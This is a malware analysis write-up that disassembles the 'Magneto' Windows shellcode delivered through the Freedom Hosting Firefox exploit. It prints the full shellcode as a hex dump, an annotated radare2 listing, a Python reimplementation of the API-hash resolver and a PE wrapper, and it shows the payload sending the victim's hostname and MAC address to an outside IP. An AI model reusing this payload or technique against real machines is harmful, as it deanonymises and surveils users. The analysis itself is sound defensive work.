# MalwareMustDie!

# Cracking Magneto (FBI Freedom Hosting Payload malware)

# by @unixfreaxjp using r2 (r2 rocks!)

# decode the function f(var15, view, var16) in the malware infector Javascript code in http://pastebin.com/RTwsyrH8

# grabbed from the evil IFRAMER Javascript in http://pastebin.com/bu2Ya0n6

# (the above URL was obtained by the hard work of MMD DE)

# Analysis method:

# Extract the value, check the hex, and parse it with the script from

# https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/

# correct result of the bins:

[0x00000226]> !vt check ./magneto.payload.shellcode
-----------------------------------------------------------
VT-shell 1.1 FreeBSD version - by @unixfreaxjp
-----------------------------------------------------------
Sample : ./magneto.payload.shellcode
MD5    : 7655cb3af1869988edf698e0ea665c27
SHA256 : 74414c3397dc0de10fbe0adedb7f033028fe4bb57ac4f51784a6df1a7b0114f0
URL    : https://www.virustotal.com/latest-scan/74414c3397dc0de10fbe0adedb7f033028fe4bb57ac4f51784a6df1a7b0114f0
-----------------------------------------------------------

// Bins info:
file  magneto.payload.shellcode
fd    10
size  0x3bc
mode  r--
block 0x7d0

// hex raw:


# I save it:

-rwxr--r--  mmd  mmd  956 Aug 13 05:01 magneto.payload.shellcode*

# view it with hexbins and you will get some idea:

0000  60 FC E8 8A 00 00 00 60 89 E5 31 D2 64 8B 52 30  `......`..1.d.R0
0010  8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31  .R..R..r(..J&1.1
0020  C0 AC 3C 61 7C 02 2C 20 C1 CF 0D 01 C7 E2 F0 52  ..<a|., .......R
0030  57 8B 52 10 8B 42 3C 01 D0 8B 40 78 85 C0 74 4A  W.R..B<...@x..tJ
0040  01 D0 50 8B 48 18 8B 58 20 01 D3 E3 3C 49 8B 34  ..P.H..X ...<I.4
0050  8B 01 D6 31 FF 31 C0 AC C1 CF 0D 01 C7 38 E0 75  ...1.1.......8.u
0060  F4 03 7D F8 3B 7D 24 75 E2 58 8B 58 24 01 D3 66  ..}.;}$u.X.X$..f
0070  8B 0C 4B 8B 58 1C 01 D3 8B 04 8B 01 D0 89 44 24  ..K.X.........D$
0080  24 5B 5B 61 59 5A 51 FF E0 58 5F 5A 8B 12 EB 86  $[[aYZQ..X_Z....
0090  05 5D 81 BD E9 02 00 00 47 45 54 20 75 70 8D 85  .]......GET up..   <=== "GET"
00A0  D1 02 00 00 50 68 4C 77 26 07 FF D5 85 C0 74 5E  ....PhLw&.....t^
00B0  8D 85 D8 02 00 00 50 68 4C 77 26 07 FF D5 85 C0  ......PhLw&.....
00C0  74 4C BB 90 01 00 00 29 DC 54 53 68 29 80 6B 00  tL.....).TSh).k.
00D0  FF D5 01 DC 85 C0 75 36 50 50 50 50 40 50 40 50  ......u6PPPP@P@P
00E0  68 EA 0F DF E0 FF D5 31 DB F7 D3 39 C3 74 1F 89  h......1...9.t..
00F0  C3 6A 10 8D B5 E1 02 00 00 56 53 68 99 A5 74 61  .j.......VSh..ta
0100  FF D5 85 C0 74 1F FE 8D 89 00 00 00 75 E3 80 BD  ....t.......u...
0110  4F 02 00 00 01 74 07 E8 3B 01 00 00 EB 05 E8 4D  O....t..;......M
0120  01 00 00 FF E7 B8 00 01 00 00 29 C4 89 E2 52 50  ..........)...RP
0130  52 68 B6 49 DE 01 FF D5 5F 81 C4 00 01 00 00 85  Rh.I...._.......
0140  C0 0F 85 F2 00 00 00 57 E8 F9 00 00 00 5E 89 CA  .......W.....^..
0150  8D BD E9 02 00 00 E8 EB 00 00 00 4F 83 FA 20 7C  ...........O.. |
0160  05 BA 20 00 00 00 89 D1 56 F3 A4 B9 0D 00 00 00  .. .....V.......
0170  8D B5 C4 02 00 00 F3 A4 89 BD 4B 02 00 00 5E 56  ..........K...^V
0180  68 A9 28 34 80 FF D5 85 C0 0F 84 AA 00 00 00 66  h.(4...........f
0190  8B 48 0A 66 83 F9 04 0F 82 9C 00 00 00 8D 40 0C  .H.f..........@.
01A0  8B 00 8B 08 8B 09 B8 00 01 00 00 50 89 E7 29 C4  ...........P..).
01B0  89 E6 57 56 51 51 68 48 72 D2 B8 FF D5 85 C0 81  ..WVQQhHr.......
01C0  C4 04 01 00 00 0F B7 0F 83 F9 06 72 6C B9 06 00  ...........rl...
01D0  00 00 B8 10 00 00 00 29 C4 89 E7 89 CA D1 E2 50  .......).......P
01E0  52 31 D2 8A 16 88 D0 24 F0 C0 E8 04 3C 09 77 04  R1.....$....<.w.
01F0  04 30 EB 02 04 37 88 07 47 88 D0 24 0F 3C 09 77  .0...7..G..$.<.w
0200  04 04 30 EB 02 04 37 88 07 47 46 E2 D4 59 29 CF  ..0...7..GF..Y).
0210  89 FE 58 01 C4 8B BD 4B 02 00 00 F3 A4 C6 85 4F  ..X....K.......O
0220  02 00 00 01 E8 2E 00 00 00 31 C0 50 51 29 CF 4F  .........1.PQ).O
0230  57 53 68 C2 EB 38 5F FF D5 53 68 75 6E 4D 61 FF  WSh..8_..ShunMa.
0240  D5 E9 C8 FE FF FF 31 C9 F7 D1 31 C0 F2 AE F7 D1  ......1...1.....
0250  49 C3 00 00 00 00 00 8D BD E9 02 00 00 E8 E4 FF  I...............
0260  FF FF 4F B9 4F 00 00 00 8D B5 75 02 00 00 F3 A4  ..O.O.....u.....
0270  8D BD E9 02 00 00 E8 CB FF FF FF C3 0D 0A 43 6F  ..............Co   <=== "HTTP headers"
0280  6E 6E 65 63 74 69 6F 6E 3A 20 6B 65 65 70 2D 61  nnection: keep-a
0290  6C 69 76 65 0D 0A 41 63 63 65 70 74 3A 20 2A 2F  live..Accept: */
02A0  2A 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69  *..Accept-Encodi
02B0  6E 67 3A 20 67 7A 69 70 0D 0A 0D 0A 00 83 C7 0E  ng: gzip........
02C0  31 C9 F7 D1 31 C0 F3 AE 4F FF E7 0D 0A 43 6F 6F  1...1...O....Coo   <=== "Cookie...."
02D0  6B 69 65 3A 20 49 44 3D 77 73 32 5F 33 32 00 49  kie: ID=ws2_32.I
02E0  50 48 4C 50 41 50 49 00 02 00 00 50 41 DE CA 36  PHLPAPI....PA..6   <=== "IPHLPAPI.DLL trace...to what call??"
02F0  47 45 54 20 2F 30 35 63 65 61 34 64 65 2D 39 35  GET /05cea4de-95   <=== "Path URL & HTTP/1.1 used.."
0300  31 64 2D 34 30 33 37 2D 62 66 38 66 2D 66 36 39  1d-4037-bf8f-f69
0310  30 35 35 62 32 37 39 62 62 20 48 54 54 50 2F 31  055b279bb HTTP/1
0320  2E 31 0D 0A 48 6F 73 74 3A 20 00 00 00 00 00 00  .1..Host: ......   <=== "to bin encoded Host..."
0330  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0340  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0350  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0360  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0370  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0380  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0390  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
03A0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
03B0  00 00 00 00 00 00 00 00 00 00 00 90              ............

# I am using radare to break down the opcodes, and manually traced the flow & translated the WinAPI calls.

# Below is the positive result. Some mystery is left, e.g. the data after the HTTP request string, which is excluded.

[0x00000000]> b 2000
[0x00000000]> pd
Do you want to print 199415 chars? (y/N)
         0x00000000  60            pushad
         0x00000001  fc            cld
         0x00000002  e88a000000    call 0x91
         0x00000091  (unk)
         0x00000007  60            pushad
         0x00000008  89e5          mov ebp, esp
         0x0000000a  31d2          xor edx, edx
         0x0000000c  648b5230      mov edx, [fs:edx+0x30]
         0x00000010  8b520c        mov edx, [edx+0xc]
         0x00000013  8b5214        mov edx, [edx+0x14]
.------> 0x00000016  8b7228        mov esi, [edx+0x28]
|        0x00000019  0fb74a26      movzx ecx, word [edx+0x26]
|        0x0000001d  31ff          xor edi, edi
| .----> 0x0000001f  31c0          xor eax, eax
| |      0x00000021  ac            lodsb
| |      0x00000022  3c61          cmp al, 0x61
| |,=<   0x00000024  7c02          jl 0x28
| ||     0x00000026  2c20          sub al, 0x20
| |`->   0x00000028  c1cf0d        ror edi, 0xd
| |      0x0000002b  01c7          add edi, eax
| `==<   0x0000002d  e2f0          loop 0x1f
|        0x0000002f  52            push edx
|        0x00000030  57            push edi
|        0x00000031  8b5210        mov edx, [edx+0x10]
|        0x00000034  8b423c        mov eax, [edx+0x3c]
|        0x00000037  01d0          add eax, edx
|        0x00000039  8b4078        mov eax, [eax+0x78]
|        0x0000003c  85c0          test eax, eax
| ,===<  0x0000003e  744a          jz 0x8a
| |      0x00000040  01d0          add eax, edx
| |      0x00000042  50            push eax
| |      0x00000043  8b4818        mov ecx, [eax+0x18]
| |      0x00000046  8b5820        mov ebx, [eax+0x20]
| |      0x00000049  01d3          add ebx, edx
| |.---> 0x0000004b  e33c          jecxz 0x89
| ||     0x0000004d  49            dec ecx
| ||     0x0000004e  8b348b        mov esi, [ebx+ecx*4]
| ||     0x00000051  01d6          add esi, edx
| ||     0x00000053  31ff          xor edi, edi
| ||.--> 0x00000055  31c0          xor eax, eax
| |||    0x00000057  ac            lodsb
| |||    0x00000058  c1cf0d        ror edi, 0xd
| |||    0x0000005b  01c7          add edi, eax
| |||    0x0000005d  38e0          cmp al, ah
| ||`==< 0x0000005f  75f4          jnz 0x55
| ||     0x00000061  037df8        add edi, [ebp-0x8]
| ||     0x00000064  3b7d24        cmp edi, [ebp+0x24]
| |`===< 0x00000067  75e2          jnz 0x4b
| |      0x00000069  58            pop eax
| |      0x0000006a  8b5824        mov ebx, [eax+0x24]
| |      0x0000006d  01d3          add ebx, edx
| |      0x0000006f  668b0c4b      mov cx, [ebx+ecx*2]
| |      0x00000073  8b581c        mov ebx, [eax+0x1c]
| |      0x00000076  01d3          add ebx, edx
| |      0x00000078  8b048b        mov eax, [ebx+ecx*4]
| |      0x0000007b  01d0          add eax, edx
| |      0x0000007d  89442424      mov [esp+0x24], eax
| |      0x00000081  5b            pop ebx
| |      0x00000082  5b            pop ebx
| |      0x00000083  61            popad
| |      0x00000084  59            pop ecx
| |      0x00000085  5a            pop edx
| |      0x00000086  51            push ecx
| |      0x00000087  ffe0          jmp eax
| |      0x00000089  58            pop eax
| `----> 0x0000008a  5f            pop edi
|        0x0000008b  5a            pop edx
|        0x0000008c  8b12          mov edx, [edx]
`======< 0x0000008e  eb86          jmp 0x16
         0x00000090  05            db 0x05                        ; data: the connect retry counter decremented at 0x106 (r2's linear sweep desyncs here)
         0x00000091  5d            pop ebp                        ; target of the call at 0x02, so ebp = 0x07 = the API resolver stub above
         0x00000092  81bde902000047455420  cmp dword [ebp+0x2e9], 0x20544547 ; is "GET " still in the request template at ebp+0x2e9?
         0x0000009c  7570          jnz 0x10e
         0x0000009e  8d85d1020000  lea eax, [ebp+0x2d1]           ; ASCII "ws2_32"
         0x000000a4  50            push eax
         0x000000a5  684c772607    push 0x726774c                 ; 0x0726774c ; "LoadLibraryA@KERNEL32.DLL (Import, Hidden, 1 Params)"
         0x000000aa  ffd5          call ebp
         0x00000000  (unk, unk, unk, unk, unk, unk, unk, unk)
         0x000000ac  85c0          test eax, eax
,======< 0x000000ae  745e          jz 0x10e
|        0x000000b0  8d85d8020000  lea eax, [ebp+0x2d8]           ; ASCII "IPHLPAPI"
|        0x000000b6  50            push eax
|        0x000000b7  684c772607    push 0x726774c                 ; 0x0726774c ; "LoadLibraryA@KERNEL32.DLL (Import, Hidden, 1 Params)"
|        0x000000bc  ffd5          call ebp
|        0x00000000  (unk, unk)
|        0x000000be  85c0          test eax, eax
|======< 0x000000c0  744c          jz 0x10e
|        0x000000c2  bb90010000    mov ebx, 0x190
|        0x000000c7  29dc          sub esp, ebx
|        0x000000c9  54            push esp
|        0x000000ca  53            push ebx
|        0x000000cb  6829806b00    push 0x6b8029                  ; 0x006b8029 ; "WSAStartupA@WS2_32.DLL"
|        0x000000d0  ffd5          call ebp
|        0x00000000  (unk, unk, unk)
|        0x000000d2  01dc          add esp, ebx
|        0x000000d4  85c0          test eax, eax
|======< 0x000000d6  7536          jnz 0x10e
|        0x000000d8  50            push eax
|        0x000000d9  50            push eax
|        0x000000da  50            push eax
|        0x000000db  50            push eax
|        0x000000dc  40            inc eax
|        0x000000dd  50            push eax
|        0x000000de  40            inc eax
|        0x000000df  50            push eax
|        0x000000e0  68ea0fdfe0    push 0xe0df0fea                ; 0xe0df0fea ; "WSASocketA@WS2_32.DLL (Import, Hidden, 6 Params)"
|        0x000000e5  ffd5          call ebp
|        0x00000000  (unk, unk, unk, unk, unk, unk, unk)
|        0x000000e7  31db          xor ebx, ebx
|        0x000000e9  f7d3          not ebx
|        0x000000eb  39c3          cmp ebx, eax
|======< 0x000000ed  741f          jz 0x10e
|        0x000000ef  89c3          mov ebx, eax
|.-----> 0x000000f1  6a10          push 0x10                      ; 0x00000010 ; the length, why does it have to be this specific??
||       0x000000f3  8db5e1020000  lea esi, [ebp+0x2e1]           ; struct sockaddr_in {AF_INET, "80", "65.222.202.54"}
||                                 ^^^^^^^^^^^^^^^^^^ 2nd Callback is here!
||       0x000000f9  56            push esi                       ; sockaddr
||       0x000000fa  53            push ebx                       ; socket
||       0x000000fb  6899a57461    push 0x6174a599                ; 0x6174a599 ; "connect@WS2_32.DLL (Import, Hidden, 3 Params)"
||       0x00000100  ffd5          call ebp
||       0x00000000  (unk, unk, unk, unk)
||       0x00000102  85c0          test eax, eax                  ; executed all of the opening connection part, to that IP, boom!!
||=====< 0x00000104  741f          jz 0x125
||       0x00000106  fe8d89000000  dec byte [ebp+0x89]            ; 5
|`=====< 0x0000010c  75e3          jnz 0xf1
`------> 0x0000010e  80bd4f02000.  cmp byte [ebp+0x24f], 0x1
,======< 0x00000115  7407          jz 0x11e
|        0x00000117  e83b010000    call 0x257
|        0x00000257  ()
|======< 0x0000011c  eb05          jmp 0x123
`------> 0x0000011e  e84d010000    call 0x270
         0x00000270  ()
-------> 0x00000123  ffe7          jmp edi
-------> 0x00000125  b800010000    mov eax, 0x100
         0x0000012a  29c4          sub esp, eax
         0x0000012c  89e2          mov edx, esp
         0x0000012e  52            push edx
         0x0000012f  50            push eax
         0x00000130  52            push edx                       ; below is where the hostname is grabbed ↓
         0x00000131  68b649de01    push 0x1de49b6                 ; 0x01de49b6 ; "gethostname@WS2_32.DLL (Import, Hidden, 2 Params)"
         0x00000136  ffd5          call ebp
         0x00000000  (unk, unk, unk, unk)
         0x00000138  5f            pop edi
         0x00000139  81c400010000  add esp, 0x100
         0x0000013f  85c0          test eax, eax                  ; PoC of execution for the above code.
,======< 0x00000141  0f85f2000000  jnz 0x239
|        0x00000147  57            push edi
|        0x00000148  e8f9000000    call 0x246                     ; strlen(gethostname);
|        0x00000246  (unk)
|        0x0000014d  5e            pop esi
|        0x0000014e  89ca          mov edx, ecx
|        0x00000150  8dbde9020000  lea edi, [ebp+0x2e9]
|        0x00000156  e8eb000000    call 0x246                     ; // shift to the end of the HTTP request string.. question is why? --(3)
|        0x00000246  ()
|        0x0000015b  4f            dec edi
|        0x0000015c  83fa20        cmp edx, 0x20
|,=====< 0x0000015f  7c05          jl 0x166
||       0x00000161  ba20000000    mov edx, 0x20
|`-----> 0x00000166  89d1          mov ecx, edx
|        0x00000168  56            push esi
|        0x00000169  f3a4          rep movsb
|        0x0000016b  b90d000000    mov ecx, 0xd                   ; below is how the cookie data will be checked (compared)
|        0x00000170  8db5c4020000  lea esi, [ebp+0x2c4]           ; "\r\nCookie: ID="
|        0x00000176  f3a4          rep movsb
|        0x00000178  89bd4b020000  mov [ebp+0x24b], edi
|        0x0000017e  5e            pop esi
|        0x0000017f  56            push esi                       ; below is the check of host
|        0x00000180  68a9283480    push 0x803428a9                ; 0x803428a9 ; "gethostbyname@WS2_32.DLL (Import, Hidden, 1 Params)"
|        0x00000185  ffd5          call ebp
|        0x00000000  (unk, unk, unk)
|        0x00000187  85c0          test eax, eax                  ; PoC of the execution of the above code.
|======< 0x00000189  0f84aa000000  jz 0x239
|        0x0000018f  668b480a      mov cx, [eax+0xa]
|        0x00000193  6683f904      cmp cx, 0x4
|======< 0x00000197  0f829c000000  jb 0x239
|        0x0000019d  8d400c        lea eax, [eax+0xc]
|        0x000001a0  8b00          mov eax, [eax]
|        0x000001a2  8b08          mov ecx, [eax]
|        0x000001a4  8b09          mov ecx, [ecx]
|        0x000001a6  b800010000    mov eax, 0x100
|        0x000001ab  50            push eax
|        0x000001ac  89e7          mov edi, esp
|        0x000001ae  29c4          sub esp, eax
|        0x000001b0  89e6          mov esi, esp
|        0x000001b2  57            push edi
|        0x000001b3  56            push esi
|        0x000001b4  51            push ecx
|        0x000001b5  51            push ecx                       ; this ↓ is the ARP sending function w/ sending TCP/IP
|        0x000001b6  684872d2b8    push 0xb8d27248                ; 0xb8d27248 ; "SendARP@IPHLPAPI.DLL" <== now we know where the MAC addr comes from
|        0x000001bb  ffd5          call ebp
|        0x00000000  (unk, unk, unk, unk, unk, unk)
|        0x000001bd  85c0          test eax, eax                  ; this code is a PoC of an execution, boom!!
|        0x000001bf  81c404010000  add esp, 0x104
|        0x000001c5  0fb70f        movzx ecx, word [edi]
|        0x000001c8  83f906        cmp ecx, 0x6
|======< 0x000001cb  726c          jb 0x239
|        0x000001cd  b906000000    mov ecx, 0x6
|        0x000001d2  b810000000    mov eax, 0x10
|        0x000001d7  29c4          sub esp, eax
|        0x000001d9  89e7          mov edi, esp
|        0x000001db  89ca          mov edx, ecx
|        0x000001dd  d1e2          shl edx, 1
|        0x000001df  50            push eax
|        0x000001e0  52            push edx
|.-----> 0x000001e1  31d2          xor edx, edx
||       0x000001e3  8a16          mov dl, [esi]
||       0x000001e5  88d0          mov al, dl
||       0x000001e7  24f0          and al, 0xf0
||       0x000001e9  c0e804        shr al, 0x4
||       0x000001ec  3c09          cmp al, 0x9
||,====< 0x000001ee  7704          ja 0x1f4
|||      0x000001f0  0430          add al, 0x30
|||,===< 0x000001f2  eb02          jmp 0x1f6
||`----> 0x000001f4  0437          add al, 0x37
||`----> 0x000001f6  8807          mov [edi], al
||       0x000001f8  47            inc edi
||       0x000001f9  88d0          mov al, dl
||       0x000001fb  240f          and al, 0xf
||       0x000001fd  3c09          cmp al, 0x9
||,====< 0x000001ff  7704          ja 0x205
|||      0x00000201  0430          add al, 0x30
|||,===< 0x00000203  eb02          jmp 0x207
||`----> 0x00000205  0437          add al, 0x37
||`----> 0x00000207  8807          mov [edi], al
||       0x00000209  47            inc edi
||       0x0000020a  46            inc esi
|`=====< 0x0000020b  e2d4          loop 0x1e1
|        0x0000020d  59            pop ecx
|        0x0000020e  29cf          sub edi, ecx
|        0x00000210  89fe          mov esi, edi
|        0x00000212  58            pop eax
|        0x00000213  01c4          add esp, eax
|        0x00000215  8bbd4b020000  mov edi, [ebp+0x24b]
|        0x0000021b  f3a4          rep movsb
|        0x0000021d  c6854f02000.  mov byte [ebp+0x24f], 0x1
|        0x00000224  e82e000000    call 0x257                     ; get "Connection: keep-alive\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n"
|        0x00000257  (unk, unk)
|        0x00000229  31c0          xor eax, eax
|        0x0000022b  50            push eax
|        0x0000022c  51            push ecx
|        0x0000022d  29cf          sub edi, ecx
|        0x0000022f  4f            dec edi
|        0x00000230  57            push edi
|        0x00000231  53            push ebx
|        0x00000232  68c2eb385f    push 0x5f38ebc2                ; 0x5f38ebc2 ; "send@WS2_32.DLL (Import, Hidden, 4 Params)"
|        0x00000237  ffd5          call ebp
|        0x00000000  (unk, unk, unk, unk, unk)
`------> 0x00000239  53            push ebx
         0x0000023a  68756e4d61    push 0x614d6e75                ; 0x614d6e75 ; "closesocket@WS2_32.DLL (Import, Hidden, 1 Params)"
         0x0000023f  ffd5          call ebp
         0x00000000  (unk, unk)
=======< 0x00000241  e9c8feffff    jmp 0x10e
         0x00000246  31c9          xor ecx, ecx
         0x00000248  f7d1          not ecx
         0x0000024a  31c0          xor eax, eax
         0x0000024c  f2ae          repne scasb
         0x0000024e  f7d1          not ecx
         0x00000250  49            dec ecx
         0x00000251  c3            ret
         0x00000252  0000000000    db 0,0,0,0,0                   ; data: the dword stored at [ebp+0x24b] (0x178) and the flag byte at [ebp+0x24f] (0x10e, 0x21d)
         0x00000257  8dbde9020000  lea edi, [ebp+0x2e9]           ; called from 0x117 and 0x224 (r2's linear sweep desyncs through the data above)
         0x0000025d  e8e4ffffff    call 0x246
         0x00000262  4f            dec edi
         0x00000263  b94f000000    mov ecx, 0x4f
         0x00000268  8db575020000  lea esi, [ebp+0x275]
         0x0000026e  f3a4          rep movsb
         0x00000270  8dbde9020000  lea edi, [ebp+0x2e9]
         0x00000276  e8cbffffff    call 0x246
         0x00000246  ()
         0x0000027b  c3            ret
         0x0000027c  0d0a436f6e    or eax, 0x6e6f430a
         0x00000281  6e            outsb
         0x00000282  656374696f    arpl [gs:ecx+ebp*2+0x6f], si
         0x00000287  6e            outsb
         0x00000288  3a20          cmp ah, [eax]
         0x0000028a  6b656570      imul esp, [ebp+0x65], 0x70
         0x0000028e  2d616c6976    sub eax, 0x76696c61
         0x00000293  650d0a416363  or eax, 0x6363410a
,=<      0x00000299  657074        jo 0x310
|        0x0000029c  3a20          cmp ah, [eax]
|        0x0000029e  2a2f          sub ch, [edi]
|        0x000002a0  2a0d0a416363  sub cl, [0x6363410a]
,==<     0x000002a6  657074        jo 0x31d
||       0x000002a9  2d456e636f    sub eax, 0x6f636e45
||       0x000002ae  64696e673a2.  imul ebp, [fs:esi+0x67], 0x7a67203a
||       0x000002b6  69700d0a0d0.  imul esi, [eax+0xd], 0xa0d0a
||       0x000002bd  83c70e        add edi, 0xe
||       0x000002c0  31c9          xor ecx, ecx
||       0x000002c2  f7d1          not ecx
||       0x000002c4  31c0          xor eax, eax
||       0x000002c6  f3ae          repe scasb
||       0x000002c8  4f            dec edi
||       0x000002c9  ffe7          jmp edi
||       0x000002cb  0d0a436f6f    or eax, 0x6f6f430a
||       0x000002d0  6b69653a      imul ebp, [ecx+0x65], 0x3a
||       0x000002d4  204944        and [ecx+0x44], cl
||       0x000002d7  3d7773325f    cmp eax, 0x5f327377
||       0x000002dc  3332          xor esi, [edx]
||       0x000002de  004950        add [ecx+0x50], cl
||       0x000002e1  48            dec eax
||       0x000002e2  4c            dec esp
||       0x000002e3  50            push eax
||       0x000002e4  41            inc ecx
||       0x000002e5  50            push eax
||       0x000002e6  49            dec ecx
||       0x000002e7  0002          add [edx], al
||       0x000002e9  0000          add [eax], al
||       0x000002eb  50            push eax
||       0x000002ec  41            inc ecx
||       0x000002ed  deca          fmulp st2, st0
||       0x000002ef  3647          inc edi
||       0x000002f1  45            inc ebp
||       0x000002f2  54            push esp
||       0x000002f3  202f          and [edi], ch
||       0x000002f5  303563656134  xor [0x34616563], dh
||       0x000002fb  64652d39353.  sub eax, 0x64313539
||       0x00000302  2d34303337    sub eax, 0x37333034
||       0x00000307  2d62663866    sub eax, 0x66386662
||       0x0000030c  2d66363930    sub eax, 0x30393666
|`-----> 0x00000311  3535623237    xor eax, 0x37326235
|        0x00000316  396262        cmp [edx+0x62], esp
|        0x00000319  204854        and [eax+0x54], cl
|        0x0000031c  54            push esp
`------> 0x0000031d  50            push eax
         0x0000031e  2f            das
         0x0000031f  312e          xor [esi], ebp
         0x00000321  310d0a486f73  xor [0x736f480a], ecx
,======< 0x00000327  743a          jz 0x363
|        0x00000329  2000          and [eax], al
|        0x0000032b  0000          add [eax], al
|        ... (0x0000032b-0x000003b9: 72 x "0000  add [eax], al", the zero padding after "Host: ")
`------> 0x00000363  0000          add [eax], al
         0x000003bb  90            nop
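# Added example (not from the MMD write-up): a Python re-implementation of the ROR-13 API
# hash that the stub at 0x16-0x8e computes, so the imm32 pushed before each `call ebp`
# can be resolved offline, the way the labels in the listing were obtained. Export names
# in KNOWN_APIS are the ones the listing names; the hash for "WSAStartup" is the value the
# listing labels "WSAStartupA".

```python
from __future__ import annotations

MASK32 = 0xFFFFFFFF


def ror13(value: int) -> int:
    """`ror edi, 0xd` on a 32-bit register."""
    value &= MASK32
    return ((value >> 13) | (value << 19)) & MASK32


def module_hash(dll_name: str) -> int:
    """Loop at 0x1f-0x2d: BaseDllName is UTF-16LE and ecx = MaximumLength, so the
    terminating NUL (two bytes) is hashed too. `cmp al,0x61 / jl` is a signed
    compare, so only 0x61..0x7f get 0x20 subtracted (upper-casing a-z)."""
    h = 0
    for b in (dll_name + "\0").encode("utf-16-le"):
        if 0x61 <= b <= 0x7F:
            b -= 0x20
        h = ror13(h) + b
    return h & MASK32


def export_hash(func_name: str) -> int:
    """Loop at 0x55-0x5f: ASCII export name; the NUL byte is rotated in and added
    before `cmp al, ah` ends the loop, so it is part of the hash."""
    h = 0
    for b in (func_name + "\0").encode("ascii"):
        h = ror13(h) + b
    return h & MASK32


def api_hash(dll_name: str, func_name: str) -> int:
    """0x61: `add edi, [ebp-0x8]` adds the saved module hash; 0x64 compares the sum
    with the value the caller pushed."""
    return (module_hash(dll_name) + export_hash(func_name)) & MASK32


# The DLL/export pairs named in the listing; anything else stays unresolved.
KNOWN_APIS = [
    ("kernel32.dll", "LoadLibraryA"),
    ("ws2_32.dll", "WSAStartup"),
    ("ws2_32.dll", "WSASocketA"),
    ("ws2_32.dll", "connect"),
    ("ws2_32.dll", "gethostname"),
    ("ws2_32.dll", "gethostbyname"),
    ("ws2_32.dll", "send"),
    ("ws2_32.dll", "closesocket"),
    ("iphlpapi.dll", "SendARP"),
]


def hash_table() -> dict[int, str]:
    return {api_hash(d, f): f"{f}@{d.upper()}" for d, f in KNOWN_APIS}


def resolve(pushed: int) -> str | None:
    """Map one `push imm32` operand to its API label, or None if unknown."""
    return hash_table().get(pushed & MASK32)


# push operands in the order they appear in the listing (0xa5 .. 0x23a)
PUSHED_HASHES = [0x0726774C, 0x0726774C, 0x006B8029, 0xE0DF0FEA, 0x6174A599,
                 0x01DE49B6, 0x803428A9, 0xB8D27248, 0x5F38EBC2, 0x614D6E75]


def annotate(pushes: list[int]) -> list[str]:
    return [f"0x{h:08x} -> {resolve(h) or '<unresolved>'}" for h in pushes]


if __name__ == "__main__":
    print("\n".join(annotate(PUSHED_HASHES)))
```

The same function works on any Metasploit-style x86 shellcode that uses this resolver; only KNOWN_APIS needs extending.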

# Explanation & conclusion for payload

The exploit targets Firefox; this shellcode targets Windows only, and it affects every victim who accessed the specific .onion sites where the redirection script was implanted.

So the payload is shellcode. It sends a callback carrying the hostname string (data) to a specific IP outside of Tor.

During the connection session it sends ARP (SendARP) to a specific host argument, which attaches the PC's MAC address to the packet sent to the destination; the PCAP is the PoC for this.

The GET request itself sends the global IP of the infected PC to the remote host. The PC's hostname was grabbed before the send operation was done.

# Callback:

The IP address GeoIP:

65.222.202.54
ASN    : 701 / UUNET
Prefix : 65.192.0.0/11
Vienna, Virginia, United States, North America
38.9012, -77.2653  Verizon Business

Note: one of an unlisted (N/A) block of eight IP addresses in the USA that has no organization listed.

# Dumping the shellcode into the exe....

# binhex:

0000  4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00  MZ..............
0010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0030  00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00  ............@...
0040  50 45 00 00 4C 01 01 00 5D BE 45 45 00 00 00 00  PE..L...].EE....
0050  00 00 00 00 E0 00 03 01 0B 01 08 00 BC 03 00 00  ................
0060  00 00 00 00 00 00 00 00 60 01 00 00 60 01 00 00  ........`...`...
0070  1C 05 00 00 00 00 40 00 01 00 00 00 01 00 00 00  ......@.........
0080  04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00  ................
0090  1C 05 00 00 60 01 00 00 00 00 00 00 02 00 00 04  ....`...........
00A0  00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00  ................
00B0  00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00  ................
00C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0100  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0110  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0120  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0130  00 00 00 00 00 00 00 00 2E 74 65 78 74 00 00 00  .........text...
0140  BC 03 00 00 60 01 00 00 BC 03 00 00 60 01 00 00  ....`.......`...
0150  00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60  ............ ..`
0160-051B: the 0x3bc bytes of .text, byte for byte the magneto.payload.shellcode dump shown above

# Faiyaaaaaa!!!!

# grab a PCAP:

https://lh4.googleusercontent.com/-0wkNuNmGI7s/U-r58ZI8l3I/AAAAAAAAQec/e7jPTahuyO8/s1152/001.png

# headers

13:55:52.350640 IP 192.168.0.20.1065 > 65.222.202.54.http: Flags [S], seq 4027180372, win 65535, options [mss 1460,nop,nop,sackOK], length 0
13:55:52.350691 IP 65.222.202.54.http > 192.168.0.20.1065: Flags [S.], seq 1594076372, ack 4027180373, win 14600, options [mss 1460,nop,nop,sackOK], length 0
13:55:52.350916 IP 192.168.0.20.1065 > 65.222.202.54.http: Flags [.], ack 1, win 65535, length 0
